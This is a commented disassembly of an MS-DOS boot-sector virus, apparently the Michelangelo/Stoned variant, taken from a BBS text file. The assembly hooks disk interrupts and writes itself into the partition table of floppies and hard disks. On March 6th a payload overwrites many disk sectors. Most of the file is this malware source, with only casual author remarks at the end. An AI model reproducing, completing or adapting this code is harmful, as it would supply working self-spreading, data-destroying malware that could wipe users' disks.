start:
jmp loc_6 ; (01AF) "This is what you see at sector 0"
db 0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
db 0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
db 50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
db 0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
db 4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
db 9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
db 9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
db 2, 0, 58h, 1Fh, 2Eh, 0FFh
db 2Eh, 0Ah, 0, 50h, 53h, 51h
db 52h, 1Eh, 6, 56h, 57h, 0Eh
db 1Fh, 0Eh, 7, 0BEh, 4, 0
loc_1: ;Init registers
mov ax,201h
mov bx,200h
mov cx,1
xor dx,dx ; Zero register
pushf ; Push flags
call dword ptr ds:data_9e ; (694E:000A=0)
jnc loc_2 ; Jump if carry=0
xor ax,ax ; Zero register
pushf ; Push flags
call dword ptr ds:data_9e ; (694E:000A=0)
dec si
jnz loc_1 ; Jump if not zero
jmp short loc_5 ; (01A6)
loc_2: ;Zero registers clear direction
xor si,si ; Zero register
cld ; Clear direction
lodsw ; String [si] to ax
cmp ax,[bx]
jne loc_3 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,[bx+2]
je loc_5 ; Jump if equal
loc_3: ; cmp byte ptr See infected
mov ax,301h
mov dh,1
mov cl,3
cmp byte ptr [bx+15h],0FDh
je loc_4 ; Jump if equal
mov cl,0Eh
loc_4: ;call out all db hiden data
mov ds:data_8e,cx ; (694E:0008=0)
pushf ; Push flags
call dword ptr ds:data_9e ; (694E:000A=0)
jc loc_5 ; Jump if carry Set
mov si,3BEh
mov di,1BEh
mov cx,21h
cld ; Clear direction
rep movsw ; Rep while cx>0 Mov [si]
mov ax,301h ; to es:[di]
xor bx,bx ; Zero register
mov cx,1
xor dx,dx ; Zero register
pushf ; Push flags
call dword ptr ds:data_9e ; (694E:000A=0)
loc_5: ;Clear all set
pop di
pop si
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
retn
loc_6: ;Load all hiden data
xor ax,ax ; Zero register
mov ds,ax
cli ; Disable interrupts
mov ss,ax
mov ax,7C00h
mov sp,ax
sti ; Enable interrupts
push ds
push ax
mov ax,ds:data_1e ; (0000:004C=1DB1h)
mov ds:data_5e,ax ; (0000:7C0A=49EBh)
mov ax,ds:data_2e ; (0000:004E=70h)
mov ds:data_6e,ax ; (0000:7C0C=2A3Ch)
mov ax,ds:data_3e ; (0000:0413=280h)
dec ax
dec ax
mov ds:data_3e,ax ; (0000:0413=280h)
mov cl,6
shl ax,cl ; Shift w/zeros fill
mov es,ax
mov ds:data_4e,ax ; (0000:7C05=203Ch)
mov ax,0Eh
mov ds:data_1e,ax ; (0000:004C=1DB1h)
mov ds:data_2e,es ; (0000:004E=70h)
mov cx,1BEh
mov si,7C00h
xor di,di ; Zero register
cld ; Clear direction
rep movsb ; Rep while cx>0 Mov [si]
jmp dword ptr cs:data_11e ; to es:[di] (694E:7C03=0)
db 33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
db 0Eh, 1Fh, 0B8h, 1, 2, 0BBh ; cd 13
db 0, 7Ch, 8Bh, 0Eh, 8, 0
db 83h, 0F9h, 7, 75h, 7, 0BAh
db 80h, 0, 0CDh, 13h, 0EBh, 2Bh
db 8Bh, 0Eh, 8, 0, 0BAh, 0
db 1, 0CDh, 13h, 72h, 20h, 0Eh
db 7, 0B8h, 1, 2, 0BBh, 0
db 2, 0B9h, 1, 0, 0BAh, 80h
db 0, 0CDh, 13h, 72h, 0Eh, 33h
db 0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
db 4Fh, 0ADh, 3Bh, 47h, 2
db 75h, 49h
loc_7:;check if it is time to nuke
xor cx,cx ; Zero register
mov ah,4
int 1Ah ; Real time clock ah=func 04h don't work on an xt
; read date cx=year, dx=mon/day
cmp dx,306h ; See if March 6th
je loc_8 ; Jump if equal to nuking subs
retf ; Return to launch command.com
loc_8:;get ready
xor dx,dx ; Zero register
mov cx,1
loc_9:;run 7 times nuke 31.5 megs of hd
mov ax,309h
mov si,ds:data_8e ; (694E:0008=0)
cmp si,3
je loc_10 ; Jump if equal
mov al,0Eh
cmp si,0Eh
je loc_10 ; Jump if equal
mov dl,80h
mov byte ptr ds:data_7e,4 ; (694E:0007=0)
mov al,11h
loc_10: ;nuke away
mov bx,5000h
mov es,bx
int 13h ; Disk dl=drive a: ah=func 03h
; write sectors from mem es:bx
jnc loc_11 ; Jump if carry=0
xor ah,ah ; Zero register
int 13h ; Disk dl=drive a: ah=func 00h
; reset disk, al=return status
loc_11: ;rest for loc-9 nuking
inc dh
cmp dh,ds:data_7e ; (694E:0007=0)
jb loc_9 ; Jump if below
xor dh,dh ; Zero register
inc ch
jmp short loc_9 ; (0250)
loc_12:;time to infect a floppie or hard dirve
mov cx,7
mov ds:data_8e,cx ; (694E:0008=0)
mov ax,301h
mov dx,80h
int 13h ; Disk dl=drive a: ah=func 03h infect flopie
; write sectors from mem es:bx
jc loc_7 ; Jump if carry Set
mov si,3BEh
mov di,1BEh
mov cx,21h
rep movsw ; Rep while cx>0 Mov [si]
mov ax,301h : to es:[di]
xor bx,bx ; Zero register
inc cl
int 13h ; Disk dl=drive a: ah=func 03h lets infect hd
; write sectors from mem es:bx
;* jmp short loc_13 ;*(02E0)
db 0EBh, 32h
db 1, 4, 11h, 0, 80h, 0
db 5, 5, 32h, 1, 0, 0
db 0, 0, 0
db 53h, 53h, 20h, 20h, 43h, 4Fh
db 4Dh
db 58 dup (0)
db 55h, 0AAh
seg_a ends
;Last notes this virus looks like a poor hack job on the stoned virus.
;It is kinda cool in the fact that it is hard to get out of the partition table
;even if you nuke the partition table it will live on even if you replace it.
;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
;this virus uses int 1ah which doesn't work on an XT system.
;the virus isn't actually 512 but that is how much it writes.
;it moves the boot area of a floppy to the last sector on the disk
;and on a harddrive it moves it to the last sector in the root directory
;This should show you all how much the media can over do it on things
;since this is really a lame virus,to tell you the truth there is a lot better
;ones out there.
;This in no way is a complete listing of the code for the virus.
;Nor is it the best since i'm not the best at Assembly.
;Done by Visionary.
;BTW to who ever wrote this virus... Get a life!
-------------------------------------------------------------------------------
Downloaded From P-80 Systems 304-744-2253
